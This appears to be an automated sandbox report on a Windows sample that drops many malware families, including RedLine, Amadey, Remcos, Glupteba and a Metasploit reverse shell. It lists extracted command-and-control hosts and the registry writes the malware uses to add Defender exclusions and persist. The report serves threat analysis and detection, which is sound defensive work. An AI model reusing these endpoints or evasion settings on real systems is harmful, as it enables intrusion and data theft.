amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

16-02-2024 02:54

240216-dd14ysfc71 10

16-02-2024 01:10

09-02-2024 16:00

09-02-2024 13:49

06-02-2024 16:58

06-02-2024 00:32

Analysis

max time kernel
102s
max time network
151s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
09-02-2024 13:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.bin.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

redline

Botnet

2024

195.20.16.103:20440

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

127.0.0.1:12346

Extracted

Family

amadey

Version

4.12

http://185.172.128.19

Attributes

install_dir
cd1f156d67
install_file
Utsysc.exe
strings_key
0dd3e5ee91b367c60c9e575983554b30
url_paths
/ghsdh39s/index.php

rc4.plain

Extracted

Family

smokeloader

Botnet

lab

Extracted

Family

blacknet

Version

v3.6.0 Public

Botnet

Bot

http://f0483357.xsph.ru/

Mutex

BN[PHfunXGI-6235724]

Attributes

antivm
true
elevate_uac
false
install_name
jusched.exe
splitter
|BN|
start_name
a5b002eacf54590ec8401ff6d3f920ee
startup
true
usb_spread
true

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

redline

Botnet

LiveTraffic

20.79.30.95:33223

Extracted

Family

remcos

Botnet

RemoteHost

hendersonk1.hopto.org:2404

henderson1.camdvr.org:2404

centplus1.serveftp.com:2404

harrywlike.ddns.net:2404

genekol.nsupdate.info:2404

harrywlike1.ddns.net:2404

hendersonk2022.hopto.org:2404

genekol1.nsupdate.info:2404

generem.camdvr.org:2404

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
sonic.exe
copy_folder
yakkk
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
chrome
keylog_path
%AppData%
mouse_option
false
mutex
gsgjdwg-1J0WWM
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
fuckuuuuu
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
notepad;solitaire;

Extracted

Family

lumma

http://freckletropsao.pw/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
BlackNET
BlackNET is an open source remote access tool written in VB.NET.
trojan blacknet

BlackNET payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe	family_blacknet
\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe	family_blacknet
C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe	family_blacknet

Detect Lumma Stealer payload V4 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1248-67-0x0000000000400000-0x0000000000480000-memory.dmp	family_lumma_v4
behavioral1/memory/1248-69-0x0000000000400000-0x0000000000480000-memory.dmp	family_lumma_v4
behavioral1/memory/1248-66-0x0000000000400000-0x0000000000480000-memory.dmp	family_lumma_v4
behavioral1/memory/1248-71-0x0000000000400000-0x0000000000480000-memory.dmp	family_lumma_v4
behavioral1/memory/1248-73-0x0000000000400000-0x0000000000480000-memory.dmp	family_lumma_v4

Detect ZGRat V1 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1524-358-0x0000000004E90000-0x0000000004F8E000-memory.dmp	family_zgrat_v1
behavioral1/memory/1524-364-0x0000000004E90000-0x0000000004F87000-memory.dmp	family_zgrat_v1
behavioral1/memory/1524-365-0x0000000004E90000-0x0000000004F87000-memory.dmp	family_zgrat_v1
behavioral1/memory/1524-367-0x0000000004E90000-0x0000000004F87000-memory.dmp	family_zgrat_v1
behavioral1/memory/1524-369-0x0000000004E90000-0x0000000004F87000-memory.dmp	family_zgrat_v1
behavioral1/memory/1524-371-0x0000000004E90000-0x0000000004F87000-memory.dmp	family_zgrat_v1
behavioral1/memory/1524-424-0x0000000004E90000-0x0000000004F87000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 11 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2376-202-0x00000000028D0000-0x00000000031BB000-memory.dmp	family_glupteba
behavioral1/memory/2376-204-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2376-215-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2376-217-0x00000000028D0000-0x00000000031BB000-memory.dmp	family_glupteba
behavioral1/memory/2732-219-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2732-229-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3012-232-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3012-307-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3012-380-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3012-401-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3012-425-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Files\2024.exe	family_redline
behavioral1/memory/280-83-0x0000000000C70000-0x0000000000CC2000-memory.dmp	family_redline
behavioral1/memory/1756-347-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
behavioral1/memory/1756-345-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
behavioral1/memory/1756-354-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
behavioral1/memory/1756-361-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
behavioral1/memory/1756-357-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2196-392-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat
behavioral1/memory/2196-393-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat
behavioral1/memory/2196-396-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat
behavioral1/memory/2196-398-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat
behavioral1/memory/2196-400-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\e0cbefcb1af40c7d4aff4aca26621a98.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
1156	bcdedit.exe
2780	bcdedit.exe
868	bcdedit.exe
1896	bcdedit.exe
2016	bcdedit.exe
2560	bcdedit.exe
2976	bcdedit.exe
2300	bcdedit.exe
1552	bcdedit.exe
1484	bcdedit.exe
2592	bcdedit.exe
788	bcdedit.exe
3060	bcdedit.exe
376	bcdedit.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3044 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

pid	process
3044	netsh.exe

.NET Reactor proctector 4 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Files\hv.exe	net_reactor
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe	net_reactor
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe	net_reactor
behavioral1/memory/2072-122-0x0000000001330000-0x000000000189C000-memory.dmp	net_reactor

Executes dropped EXE 31 IoCs

Processes:

bin.exe2024.execs_maltest.exebc_memories_from_the_mcp.exeasas.exehv.exebuildcosta.exef4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exebuildcosta.exef4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exee0cbefcb1af40c7d4aff4aca26621a98.exeWinlockerBuilderv5.exee0cbefcb1af40c7d4aff4aca26621a98.execsrss.exepatch.exeinjector.exeGoldprime.exehncc.exedsefix.exe6.exeart22.exeStealerClient_Cpp_1_4.exenpp86Installerx64.exenpp.8.6.2.Installer.x64.exewindefender.exesmazgcisoglo.exe07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exewindefender.exeUser%20OOBE%20Broker.exeUser%20OOBE%20Broker.exe

pid	process
2740	bin.exe
280	2024.exe
2464	cs_maltest.exe
1200	bc_memories_from_the_mcp.exe
1084	asas.exe
2072	hv.exe
2220	buildcosta.exe
1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
1564	buildcosta.exe
1540	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
2376	e0cbefcb1af40c7d4aff4aca26621a98.exe
332	WinlockerBuilderv5.exe
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
3012	csrss.exe
340	patch.exe
1580	injector.exe
660	Goldprime.exe
1524	hncc.exe
2608	dsefix.exe
1260	6.exe
2428	art22.exe
1780	StealerClient_Cpp_1_4.exe
1156	npp86Installerx64.exe
1216	npp.8.6.2.Installer.x64.exe
800	windefender.exe
272	smazgcisoglo.exe
1900	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
1668	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
928	windefender.exe
1568	User%20OOBE%20Broker.exe
2408	User%20OOBE%20Broker.exe

Loads dropped DLL 52 IoCs

Processes:

4363463463464363463463463.bin.exef4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exebuildcosta.exee0cbefcb1af40c7d4aff4aca26621a98.exepatch.execsrss.exehv.exenpp86Installerx64.exenpp.8.6.2.Installer.x64.exeWerFault.exe07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exeUser%20OOBE%20Broker.exeUser%20OOBE%20Broker.exe

pid	process
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
2016
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
2220	buildcosta.exe
2220	buildcosta.exe
3048	4363463463464363463463463.bin.exe
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
2732	e0cbefcb1af40c7d4aff4aca26621a98.exe
876
340	patch.exe
340	patch.exe
340	patch.exe
340	patch.exe
340	patch.exe
3012	csrss.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
2072	hv.exe
340	patch.exe
340	patch.exe
340	patch.exe
3012	csrss.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
1156	npp86Installerx64.exe
1156	npp86Installerx64.exe
1216	npp.8.6.2.Installer.x64.exe
476
476
3048	4363463463464363463463463.bin.exe
3048	4363463463464363463463463.bin.exe
1288	WerFault.exe
1288	WerFault.exe
1288	WerFault.exe
1900	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
3048	4363463463464363463463463.bin.exe
1568	User%20OOBE%20Broker.exe
2408	User%20OOBE%20Broker.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\e0cbefcb1af40c7d4aff4aca26621a98.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.execsrss.exenpp86Installerx64.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	npp86Installerx64.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

12 raw.githubusercontent.com
13 raw.githubusercontent.com
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
12	raw.githubusercontent.com
13	raw.githubusercontent.com

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

bin.exef4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exeGoldprime.exehv.exesmazgcisoglo.exe07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe

description	pid	process	target process
PID 2740 set thread context of 1248	2740	bin.exe	AppLaunch.exe
PID 1456 set thread context of 1540	1456	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
PID 660 set thread context of 1756	660	Goldprime.exe	RegAsm.exe
PID 2072 set thread context of 2196	2072	hv.exe	jsc.exe
PID 272 set thread context of 2524	272	smazgcisoglo.exe	explorer.exe
PID 1900 set thread context of 1668	1900	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN e0cbefcb1af40c7d4aff4aca26621a98.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	e0cbefcb1af40c7d4aff4aca26621a98.exe

Drops file in Windows directory 5 IoCs

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.exemakecab.execsrss.exe

description	ioc	process
File opened for modification	C:\Windows\rss	e0cbefcb1af40c7d4aff4aca26621a98.exe
File created	C:\Windows\rss\csrss.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240209135006.cab	makecab.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2612 sc.exe
1428 sc.exe
2160 sc.exe
1828 sc.exe
2016 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3004 2736 WerFault.exe LM.exe

pid	process
2612	sc.exe
1428	sc.exe
2160	sc.exe
1828	sc.exe
2016	sc.exe

pid	pid_target	process	target process
3004	2736	WerFault.exe	LM.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1512 schtasks.exe
2332 schtasks.exe
2540 schtasks.exe

pid	process
1512	schtasks.exe
2332	schtasks.exe
2540	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	e0cbefcb1af40c7d4aff4aca26621a98.exe
